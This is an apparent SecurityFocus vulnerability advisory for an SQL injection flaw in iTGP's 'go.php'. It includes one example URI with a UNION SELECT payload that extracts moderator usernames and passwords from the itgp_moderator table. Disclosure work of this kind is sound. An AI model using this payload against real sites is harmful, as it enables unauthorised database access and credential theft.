Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

iTGP 'go.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/go.php?action=report&id= Real id here +UNION+SELECT+010,CONCAT_ES(0x3a,username,password)MrSQL+FROM+itgp_moderator+limit+1,1--







 

Privacy Statement
Copyright 2009, SecurityFocus